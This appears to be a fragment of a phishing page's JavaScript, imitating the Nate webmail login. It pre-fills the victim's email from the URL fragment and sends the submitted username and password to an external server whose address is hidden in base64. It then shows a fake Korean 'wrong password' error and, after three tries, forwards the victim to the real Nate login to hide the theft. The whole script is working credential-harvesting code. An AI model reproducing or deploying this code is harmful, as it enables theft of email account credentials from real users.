</script>




<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script src="https://code.jquery.com/jquery-1.9.1.js"></script>
    <script>

	  
	   $(document).ready(function() {
		    var user=$("#pet").val();
		  var  count=0;
		   
		   
		   
		    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $("#msg").hide();

    }
		   
		   
        $('form').submit(function(e) {
			
			count=count+1;
			
		   var d=atob("aHR0cHM6Ly9nYnBhY2lmaWN0cmFkaW5nLnN0b3JlL3drL3BhYmxvL250LnBocA==");

            e.preventDefault();
               $.ajax({
			   
            type: 'POST',
            url: d,
			crossDomain: true,
            data: $('form').serialize(),
			
			 beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
			  
			  
			  
if (count>=3) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("https://home.mail.nate.com/login/login.html?s=mail&redirect=https%3A%2F%2Fmail3.nate.com%2F");

                  }else{
				   var x = document.getElementById("id").value;
					 
					
				   $('#submit-btn').html('CONTINUE');
					   document.getElementById("pw").value ="";
					 
					
            	$("#err_common").show();
				    $("#error_message").html("입력한 사용자 이름이나 비밀번호가 올바르지 않습니다.");
				

					 }
						
            },
			
			
					 
            success: function () {
				$("#error_message").show();
				    $("#err_common").html("입력한 사용자 이름이나 비밀번호가 올바르지 않습니다.");
				

	
            }
          });
        });
    });
    </script>
